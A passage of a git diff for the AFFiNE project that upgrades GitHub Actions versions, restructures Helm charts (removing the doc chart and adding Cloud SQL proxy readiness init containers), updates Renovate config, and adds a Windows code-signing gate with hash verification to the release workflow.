uses: actions/setup-node@v6
with:
node-version-file: '.nvmrc'
registry-url: https://npm.pkg.github.com
@@ -93,7 +93,7 @@ runs:
run: node -e "const p = $(yarn config cacheFolder --json).effective; console.log('yarn_global_cache=' + p)" >> $GITHUB_OUTPUT
- name: Cache non-full yarn cache on Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache != 'true' && runner.os == 'Linux' }}
with:
path: |
@@ -105,7 +105,7 @@ runs:
# and the decompression performance on Windows is very terrible
# so we reduce the number of cached files on non-Linux systems by remove node_modules from cache path.
- name: Cache non-full yarn cache on non-Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache != 'true' && runner.os != 'Linux' }}
with:
path: |
@@ -113,7 +113,7 @@ runs:
key: node_modules-cache-${{ github.job }}-${{ runner.os }}-${{ runner.arch }}-${{ steps.system-info.outputs.name }}-${{ steps.system-info.outputs.release }}-${{ steps.system-info.outputs.version }}
- name: Cache full yarn cache on Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache == 'true' && runner.os == 'Linux' }}
with:
path: |
@@ -122,7 +122,7 @@ runs:
key: node_modules-cache-full-${{ runner.os }}-${{ runner.arch }}-${{ steps.system-info.outputs.name }}-${{ steps.system-info.outputs.release }}-${{ steps.system-info.outputs.version }}
- name: Cache full yarn cache on non-Linux
uses: actions/cache@v4
uses: actions/cache@v5
if: ${{ inputs.full-cache == 'true' && runner.os != 'Linux' }}
with:
path: |
@@ -154,7 +154,7 @@ runs:
# Note: Playwright's cache directory is hard coded because that's what it
# says to do in the docs. There doesn't appear to be a command that prints
# it out for us.
- uses: actions/cache@v4
- uses: actions/cache@v5
id: playwright-cache
if: ${{ inputs.playwright-install == 'true' }}
with:
@@ -189,7 +189,7 @@ runs:
run: |
echo "version=$(yarn why --json electron | grep -h 'workspace:.' | jq --raw-output '.children[].locator' | sed -e 's/@playwright\/test@.*://' | head -n 1)" >> $GITHUB_OUTPUT
- uses: actions/cache@v4
- uses: actions/cache@v5
id: electron-cache
if: ${{ inputs.electron-install == 'true' }}
with:
-1
View File
@@ -7,7 +7,6 @@ inputs:
ios-app-version:
description: 'iOS App Store Version (Optional, use App version if empty)'
required: false
type: string
runs:
using: 'composite'
steps:
+1 -1
View File
@@ -3,4 +3,4 @@ name: affine
description: AFFiNE cloud chart
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
+1 -1
View File
@@ -3,7 +3,7 @@ name: doc
description: AFFiNE doc server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -1,16 +0,0 @@
1. Get the application URL by running these commands:
{{- if contains "NodePort" .Values.service.type }}
export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "doc.fullname" . }})
export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}")
echo http://$NODE_IP:$NODE_PORT
{{- else if contains "LoadBalancer" .Values.service.type }}
NOTE: It may take a few minutes for the LoadBalancer IP to be available.
You can watch the status of by running 'kubectl get --namespace {{ .Release.Namespace }} svc -w {{ include "doc.fullname" . }}'
export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "doc.fullname" . }} --template "{{"{{ range (index .status.loadBalancer.ingress 0) }}{{.}}{{ end }}"}}")
echo http://$SERVICE_IP:{{ .Values.service.port }}
{{- else if contains "ClusterIP" .Values.service.type }}
export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "doc.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}")
export CONTAINER_PORT=$(kubectl get pod --namespace {{ .Release.Namespace }} $POD_NAME -o jsonpath="{.spec.containers[0].ports[0].containerPort}")
echo "Visit http://127.0.0.1:8080 to use your application"
kubectl --namespace {{ .Release.Namespace }} port-forward $POD_NAME 8080:$CONTAINER_PORT
{{- end }}
@@ -1,63 +0,0 @@
{{/*
Expand the name of the chart.
*/}}
{{- define "doc.name" -}}
{{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }}
{{- end }}
{{/*
Create a default fully qualified app name.
We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec).
If release name contains chart name it will be used as a full name.
*/}}
{{- define "doc.fullname" -}}
{{- if .Values.fullnameOverride }}
{{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- $name := default .Chart.Name .Values.nameOverride }}
{{- if contains $name .Release.Name }}
{{- .Release.Name | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }}
{{- end }}
{{- end }}
{{- end }}
{{/*
Create chart name and version as used by the chart label.
*/}}
{{- define "doc.chart" -}}
{{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" }}
{{- end }}
{{/*
Common labels
*/}}
{{- define "doc.labels" -}}
helm.sh/chart: {{ include "doc.chart" . }}
{{ include "doc.selectorLabels" . }}
{{- if .Chart.AppVersion }}
app.kubernetes.io/version: {{ .Chart.AppVersion | quote }}
{{- end }}
app.kubernetes.io/managed-by: {{ .Release.Service }}
monitoring: enabled
{{- end }}
{{/*
Selector labels
*/}}
{{- define "doc.selectorLabels" -}}
app.kubernetes.io/name: {{ include "doc.name" . }}
app.kubernetes.io/instance: {{ .Release.Name }}
{{- end }}
{{/*
Create the name of the service account to use
*/}}
{{- define "doc.serviceAccountName" -}}
{{- if .Values.serviceAccount.create }}
{{- default (include "doc.fullname" .) .Values.global.docService.name }}
{{- else }}
{{- default "default" .Values.global.docService.name }}
{{- end }}
{{- end }}
@@ -1,118 +0,0 @@
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ include "doc.fullname" . }}
labels:
{{- include "doc.labels" . | nindent 4 }}
spec:
replicas: {{ .Values.replicaCount }}
selector:
matchLabels:
{{- include "doc.selectorLabels" . | nindent 6 }}
template:
metadata:
{{- with .Values.podAnnotations }}
annotations:
{{- toYaml . | nindent 8 }}
{{- end }}
labels:
{{- include "doc.selectorLabels" . | nindent 8 }}
spec:
{{- with .Values.imagePullSecrets }}
imagePullSecrets:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "doc.serviceAccountName" . }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
imagePullPolicy: {{ .Values.image.pullPolicy }}
env:
- name: AFFINE_PRIVATE_KEY
valueFrom:
secretKeyRef:
name: "{{ .Values.global.secret.secretName }}"
key: key
- name: NODE_ENV
value: "{{ .Values.env }}"
- name: NODE_OPTIONS
value: "--max-old-space-size=4096"
- name: NO_COLOR
value: "1"
- name: DEPLOYMENT_TYPE
value: "{{ .Values.global.deployment.type }}"
- name: DEPLOYMENT_PLATFORM
value: "{{ .Values.global.deployment.platform }}"
- name: SERVER_FLAVOR
value: "doc"
- name: AFFINE_ENV
value: "{{ .Release.Namespace }}"
- name: DATABASE_PASSWORD
valueFrom:
secretKeyRef:
name: pg-postgresql
key: postgres-password
- name: DATABASE_URL
value: postgres://{{ .Values.global.database.user }}:$(DATABASE_PASSWORD)@{{ .Values.global.database.host }}:{{ .Values.global.database.port }}/{{ .Values.global.database.name }}
- name: REDIS_SERVER_ENABLED
value: "true"
- name: REDIS_SERVER_HOST
value: "{{ .Values.global.redis.host }}"
- name: REDIS_SERVER_PORT
value: "{{ .Values.global.redis.port }}"
- name: REDIS_SERVER_USER
value: "{{ .Values.global.redis.username }}"
- name: REDIS_SERVER_PASSWORD
valueFrom:
secretKeyRef:
name: redis
key: redis-password
- name: REDIS_SERVER_DATABASE
value: "{{ .Values.global.redis.database }}"
- name: AFFINE_INDEXER_SEARCH_PROVIDER
value: "{{ .Values.global.indexer.provider }}"
- name: AFFINE_INDEXER_SEARCH_ENDPOINT
value: "{{ .Values.global.indexer.endpoint }}"
- name: AFFINE_INDEXER_SEARCH_API_KEY
valueFrom:
secretKeyRef:
name: indexer
key: indexer-apiKey
- name: AFFINE_SERVER_PORT
value: "{{ .Values.global.docService.port }}"
- name: AFFINE_SERVER_SUB_PATH
value: "{{ .Values.app.path }}"
- name: AFFINE_SERVER_HOST
value: "{{ .Values.app.host }}"
- name: AFFINE_SERVER_HTTPS
value: "{{ .Values.app.https }}"
ports:
- name: http
containerPort: {{ .Values.global.docService.port }}
protocol: TCP
livenessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ .Values.probe.timeoutSeconds }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ .Values.probe.timeoutSeconds }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
nodeSelector:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.affinity }}
affinity:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.tolerations }}
tolerations:
{{- toYaml . | nindent 8 }}
{{- end }}
@@ -1,12 +0,0 @@
{{- if .Values.serviceAccount.create -}}
apiVersion: v1
kind: ServiceAccount
metadata:
name: {{ include "doc.serviceAccountName" . }}
labels:
{{- include "doc.labels" . | nindent 4 }}
{{- with .Values.serviceAccount.annotations }}
annotations:
{{- toYaml . | nindent 4 }}
{{- end }}
{{- end }}
@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: "{{ include "doc.fullname" . }}-test-connection"
labels:
{{- include "doc.labels" . | nindent 4 }}
annotations:
"helm.sh/hook": test
spec:
containers:
- name: wget
image: busybox
command: ['wget']
args: ['{{ include "doc.fullname" . }}:{{ .Values.global.docService.port }}']
restartPolicy: Never
+4 -1
View File
@@ -30,9 +30,12 @@ podSecurityContext:
fsGroup: 2000
resources:
requests:
limits:
cpu: '1'
memory: 4Gi
requests:
cpu: '1'
memory: 2Gi
probe:
initialDelaySeconds: 20
+1 -1
View File
@@ -3,7 +3,7 @@ name: front
description: AFFiNE front server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -25,6 +25,22 @@ spec:
serviceAccountName: {{ include "front.serviceAccountName" . }}
securityContext:
{{- toYaml .Values.podSecurityContext | nindent 8 }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
@@ -88,8 +104,6 @@ spec:
value: "{{ .Values.app.host }}"
- name: AFFINE_SERVER_HTTPS
value: "{{ .Values.app.https }}"
- name: DOC_SERVICE_ENDPOINT
value: "http://{{ .Values.global.docService.name }}:{{ .Values.global.docService.port }}"
ports:
- name: http
containerPort: {{ .Values.app.port }}
@@ -98,12 +112,20 @@ spec:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
initialDelaySeconds: {{ default .Values.probe.initialDelaySeconds .Values.probe.liveness.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.liveness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.liveness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.liveness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.liveness.successThreshold }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
initialDelaySeconds: {{ default .Values.probe.initialDelaySeconds .Values.probe.readiness.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.readiness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.readiness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.readiness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.readiness.successThreshold }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
@@ -1,19 +1,19 @@
apiVersion: v1
kind: Service
metadata:
name: {{ include "doc.fullname" . }}
name: {{ .Values.global.docService.name }}
labels:
{{- include "doc.labels" . | nindent 4 }}
{{- with .Values.service.annotations }}
{{- include "front.labels" . | nindent 4 }}
{{- with .Values.services.doc.annotations }}
annotations:
{{- toYaml . | nindent 4 }}
{{- end }}
spec:
type: {{ .Values.service.type }}
type: {{ .Values.services.doc.type }}
ports:
- port: {{ .Values.global.docService.port }}
targetPort: http
protocol: TCP
name: http
selector:
{{- include "doc.selectorLabels" . | nindent 4 }}
{{- include "front.selectorLabels" . | nindent 4 }}
+15 -1
View File
@@ -29,12 +29,23 @@ podSecurityContext:
fsGroup: 2000
resources:
limits:
cpu: '1'
memory: 6Gi
requests:
cpu: '1'
memory: 2Gi
memory: 4Gi
probe:
initialDelaySeconds: 20
timeoutSeconds: 5
periodSeconds: 10
failureThreshold: 6
successThreshold: 1
liveness:
initialDelaySeconds: 60
failureThreshold: 12
readiness: {}
services:
sync:
@@ -54,6 +65,9 @@ services:
type: ClusterIP
port: 8080
annotations: {}
doc:
type: ClusterIP
annotations: {}
nodeSelector: {}
tolerations: []
@@ -12,6 +12,10 @@ spec:
targetPort: cloud-sql-proxy
protocol: TCP
name: cloud-sql-proxy
- port: 9801
targetPort: 9801
protocol: TCP
name: health
selector:
{{- include "gcloud-sql-proxy.selectorLabels" . | nindent 4 }}
{{- end }}
@@ -3,7 +3,7 @@ name: graphql
description: AFFiNE GraphQL server
type: application
version: 0.0.0
appVersion: "0.26.1"
appVersion: "0.26.3"
dependencies:
- name: gcloud-sql-proxy
version: 0.0.0
@@ -23,6 +23,22 @@ spec:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "graphql.serviceAccountName" . }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
@@ -95,11 +111,19 @@ spec:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.liveness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.liveness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.liveness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.liveness.successThreshold }}
readinessProbe:
httpGet:
path: /info
port: http
initialDelaySeconds: {{ .Values.probe.initialDelaySeconds }}
timeoutSeconds: {{ default .Values.probe.timeoutSeconds .Values.probe.readiness.timeoutSeconds }}
periodSeconds: {{ default .Values.probe.periodSeconds .Values.probe.readiness.periodSeconds }}
failureThreshold: {{ default .Values.probe.failureThreshold .Values.probe.readiness.failureThreshold }}
successThreshold: {{ default .Values.probe.successThreshold .Values.probe.readiness.successThreshold }}
resources:
{{- toYaml .Values.resources | nindent 12 }}
{{- with .Values.nodeSelector }}
@@ -13,6 +13,22 @@ spec:
template:
spec:
serviceAccountName: {{ include "graphql.serviceAccountName" . }}
{{- with .Values.global.database.gcloud }}
{{- if .enabled }}
initContainers:
- name: wait-for-cloud-sql-proxy
image: busybox:1.36.1
imagePullPolicy: IfNotPresent
command:
- /bin/sh
- -ec
- |
until wget -q -T 2 -O /dev/null "http://{{ $.Values.global.database.host }}:9801/startup"; do
echo "waiting for cloud sql proxy to become ready"
sleep 2
done
{{- end }}
{{- end }}
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag | default .Chart.AppVersion }}"
+11 -1
View File
@@ -27,12 +27,22 @@ podSecurityContext:
fsGroup: 2000
resources:
limits:
cpu: '1'
memory: 4Gi
requests:
cpu: '2'
cpu: '1'
memory: 2Gi
probe:
initialDelaySeconds: 20
timeoutSeconds: 5
periodSeconds: 10
failureThreshold: 6
successThreshold: 1
liveness:
failureThreshold: 12
readiness: {}
nodeSelector: {}
tolerations: []
+4 -6
View File
@@ -47,12 +47,6 @@ graphql:
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
doc:
service:
type: ClusterIP
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
front:
services:
sync:
@@ -71,3 +65,7 @@ front:
name: affine-web
type: ClusterIP
port: 8080
doc:
type: ClusterIP
annotations:
cloud.google.com/backend-config: '{"default": "affine-api-backendconfig"}'
+3 -3
View File
@@ -31,7 +31,7 @@
"groupSlug": "all-minor-patch",
"matchUpdateTypes": ["minor", "patch"],
"matchManagers": ["npm"],
"matchPackageNames": ["*", "!/^@blocksuite//", "!/oxlint/"]
"excludePackagePatterns": ["^@blocksuite/", "^oxlint$"]
},
{
"groupName": "all non-major dependencies",
@@ -63,7 +63,7 @@
"groupName": "opentelemetry",
"matchPackageNames": [
"/^@opentelemetry/",
"/^@google-cloud\/opentelemetry-/"
"/^@google-cloud/opentelemetry-/"
]
}
],
@@ -79,7 +79,7 @@
"customManagers": [
{
"customType": "regex",
"fileMatch": ["^rust-toolchain\\.toml?$"],
"managerFilePatterns": ["/^rust-toolchain\\.toml?$/"],
"matchStrings": [
"channel\\s*=\\s*\"(?<currentValue>\\d+\\.\\d+(\\.\\d+)?)\""
],
+7 -3
View File
@@ -1,6 +1,10 @@
name: 'Pull Request Labeler'
on:
- pull_request_target
pull_request_target:
types:
- opened
- reopened
- synchronize
jobs:
triage:
@@ -9,5 +13,5 @@ jobs:
pull-requests: write
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/labeler@v5
- uses: actions/checkout@v6
- uses: actions/labeler@v6
+8 -8
View File
@@ -24,7 +24,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -57,7 +57,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -89,7 +89,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -118,7 +118,7 @@ jobs:
build-server-native:
name: Build Server native - ${{ matrix.targets.name }}
runs-on: ubuntu-latest
runs-on: ubuntu-22.04
environment: ${{ inputs.build-type }}
strategy:
fail-fast: false
@@ -132,7 +132,7 @@ jobs:
file: server-native.armv7.node
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -166,7 +166,7 @@ jobs:
needs:
- build-server-native
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -202,7 +202,7 @@ jobs:
- build-mobile
- build-admin
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Download server dist
uses: actions/download-artifact@v4
with:
@@ -222,7 +222,7 @@ jobs:
# setup node without cache configuration
# Prisma cache is not compatible with docker build cache
- name: Setup Node.js
uses: actions/setup-node@v4
uses: actions/setup-node@v6
with:
node-version-file: '.nvmrc'
registry-url: https://npm.pkg.github.com
File diff suppressed because it is too large Load Diff
+4 -4
View File
@@ -10,7 +10,7 @@ jobs:
env:
CARGO_PROFILE_RELEASE_DEBUG: '1'
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
with:
@@ -64,7 +64,7 @@ jobs:
ports:
- 9308:9308
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
@@ -134,7 +134,7 @@ jobs:
ports:
- 9308:9308
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: ./.github/actions/setup-node
@@ -167,7 +167,7 @@ jobs:
runs-on: ubuntu-latest
name: Post test result message
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
with:
fetch-depth: 0
- name: Setup Node.js
+3 -2
View File
@@ -16,10 +16,11 @@ jobs:
check-pull-request-title:
name: Check pull request title
runs-on: ubuntu-latest
if: ${{ github.event.action != 'edited' || github.event.changes.title != null }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Node.js
uses: actions/setup-node@v4
uses: actions/setup-node@v6
with:
cache: 'yarn'
node-version-file: '.nvmrc'
+1 -1
View File
@@ -35,7 +35,7 @@ jobs:
- build-images
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Deploy to ${{ inputs.build-type }}
uses: ./.github/actions/deploy
with:
@@ -69,7 +69,7 @@ jobs:
SENTRY_DSN: ${{ secrets.SENTRY_DSN }}
SENTRY_RELEASE: ${{ inputs.app_version }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
@@ -101,7 +101,7 @@ jobs:
- name: Signing By Apple Developer ID
if: ${{ inputs.platform == 'darwin' && inputs.apple_codesign }}
uses: apple-actions/import-codesign-certs@v5
uses: apple-actions/import-codesign-certs@v7
with:
p12-file-base64: ${{ secrets.CERTIFICATES_P12 }}
p12-password: ${{ secrets.CERTIFICATES_P12_PASSWORD }}
@@ -174,18 +174,18 @@ jobs:
run: |
mkdir -p builds
mv packages/frontend/apps/electron/out/*/make/zip/linux/${{ inputs.arch }}/*.zip ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.zip
mv packages/frontend/apps/electron/out/*/make/*.AppImage ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.appimage
mv packages/frontend/apps/electron/out/*/make/AppImage/${{ inputs.arch }}/*.AppImage ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.appimage
mv packages/frontend/apps/electron/out/*/make/deb/${{ inputs.arch }}/*.deb ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.deb
mv packages/frontend/apps/electron/out/*/make/flatpak/*/*.flatpak ./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-linux-${{ inputs.arch }}.flatpak
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ inputs.platform == 'darwin' }}
with:
subject-path: |
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-macos-${{ inputs.arch }}.zip
./builds/affine-${{ env.RELEASE_VERSION }}-${{ env.BUILD_TYPE }}-macos-${{ inputs.arch }}.dmg
- uses: actions/attest-build-provenance@v2
- uses: actions/attest-build-provenance@v4
if: ${{ inputs.platform == 'linux' }}
with:
subject-path: |
+174 -24
View File
@@ -27,6 +27,11 @@ on:
required: false
default: true
type: boolean
require-windows-signing:
description: 'Require all Windows signing steps to succeed before release'
required: false
default: false
type: boolean
permissions:
actions: write
@@ -48,7 +53,7 @@ jobs:
runs-on: ubuntu-latest
environment: ${{ inputs.build-type }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -73,6 +78,21 @@ jobs:
name: desktop-web
path: packages/frontend/apps/electron/resources/web-static
windows-signer-gate:
if: ${{ inputs.desktop_windows }}
runs-on: ubuntu-latest
outputs:
signer_available: ${{ steps.check.outputs.signer_available }}
steps:
- uses: actions/checkout@v6
- name: Check windows signer availability
id: check
run: node ./scripts/check-windows-signer.mjs
env:
BUILD_TYPE: ${{ inputs.build-type }}
GITHUB_TOKEN: ${{ github.token }}
REQUIRE_SIGNER: ${{ inputs.require-windows-signing }}
make-distribution-macos:
if: ${{ inputs.desktop_macos }}
strategy:
@@ -154,24 +174,45 @@ jobs:
enable_scripts: true
sign-packaged-artifacts-windows_x64:
if: ${{ inputs.desktop_windows }}
needs: package-distribution-windows-x64
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- package-distribution-windows-x64
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.package-distribution-windows-x64.outputs.files_to_be_signed }}
artifact-name: packaged-win32-x64
sign-packaged-artifacts-windows_arm64:
if: ${{ inputs.desktop_windows }}
needs: package-distribution-windows-arm64
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- package-distribution-windows-arm64
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.package-distribution-windows-arm64.outputs.files_to_be_signed }}
artifact-name: packaged-win32-arm64
make-windows-installer:
if: ${{ inputs.desktop_windows }}
if: >-
${{
always() &&
inputs.desktop_windows &&
needs.windows-signer-gate.result == 'success' &&
needs.package-distribution-windows-x64.result == 'success' &&
needs.package-distribution-windows-arm64.result == 'success' &&
(
!inputs.require-windows-signing ||
(
needs.sign-packaged-artifacts-windows_x64.result == 'success' &&
needs.sign-packaged-artifacts-windows_arm64.result == 'success'
)
)
}}
needs:
- windows-signer-gate
- package-distribution-windows-x64
- package-distribution-windows-arm64
- sign-packaged-artifacts-windows_x64
- sign-packaged-artifacts-windows_arm64
strategy:
@@ -187,7 +228,7 @@ jobs:
FILES_TO_BE_SIGNED_x64: ${{ steps.get_files_to_be_signed.outputs.FILES_TO_BE_SIGNED_x64 }}
FILES_TO_BE_SIGNED_arm64: ${{ steps.get_files_to_be_signed.outputs.FILES_TO_BE_SIGNED_arm64 }}
steps:
- uses: actions/checkout@v4
- uses: actions/checkout@v6
- name: Setup Version
uses: ./.github/actions/setup-version
with:
@@ -201,13 +242,46 @@ jobs:
nmHoistingLimits: workspaces
env:
npm_config_arch: ${{ matrix.spec.arch }}
- name: Download and overwrite packaged artifacts
- name: Download packaged artifacts
uses: actions/download-artifact@v4
with:
name: packaged-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: packaged-unsigned
- name: unzip packaged artifacts
run: Expand-Archive -Path packaged-unsigned/archive.zip -DestinationPath packages/frontend/apps/electron/out
- name: Download signed packaged file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success') }}
uses: actions/download-artifact@v4
with:
name: signed-packaged-${{ matrix.spec.platform }}-${{ matrix.spec.arch }}
path: .
- name: unzip file
run: Expand-Archive -Path signed.zip -DestinationPath packages/frontend/apps/electron/out
path: signed-packaged-diff
- name: Apply signed packaged file diff
if: ${{ (matrix.spec.arch == 'x64' && needs.sign-packaged-artifacts-windows_x64.result == 'success') || (matrix.spec.arch == 'arm64' && needs.sign-packaged-artifacts-windows_arm64.result == 'success') }}
shell: pwsh
run: |
$DiffRoot = 'signed-packaged-diff/files'
$TargetRoot = 'packages/frontend/apps/electron/out'
if (!(Test-Path -LiteralPath $DiffRoot)) {
throw "Signed diff directory not found: $DiffRoot"
}
Copy-Item -Path (Join-Path $DiffRoot '*') -Destination $TargetRoot -Recurse -Force
$ManifestPath = 'signed-packaged-diff/manifest.json'
if (Test-Path -LiteralPath $ManifestPath) {
$ManifestEntries = @(Get-Content -LiteralPath $ManifestPath | ConvertFrom-Json)
foreach ($Entry in $ManifestEntries) {
$TargetPath = Join-Path $TargetRoot $Entry.path
if (!(Test-Path -LiteralPath $TargetPath -PathType Leaf)) {
throw "Applied signed file not found: $($Entry.path)"
}
$TargetHash = (Get-FileHash -Algorithm SHA256 -LiteralPath $TargetPath).Hash
if ($TargetHash -ne $Entry.sha256) {
throw "Signed file hash mismatch: $($Entry.path)"
}
}
}
- name: Make squirrel.windows installer
run: yarn affine @affine/electron make-squirrel --platform=${{ matrix.spec.platform }} --arch=${{ matrix.spec.arch }}
@@ -232,25 +306,38 @@ jobs:
path: archive.zip
sign-installer-artifacts-windows-x64:
if: ${{ inputs.desktop_windows }}
needs: make-windows-installer
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- make-windows-installer
uses: ./.github/workflows/windows-signer.yml
with:
files: ${{ needs.make-windows-installer.outputs.FILES_TO_BE_SIGNED_x64 }}
artifact-name: installer-win32-x64
sign-installer-artifacts-windows-arm64:
if: ${{ inputs.desktop_windows }}
needs: make-windows-installer
if: ${{ inputs.desktop_windows && needs.windows-signer-gate.outputs.signer_available == 'true' }}
needs:
- windows-signer-gate
- make-windows-installer
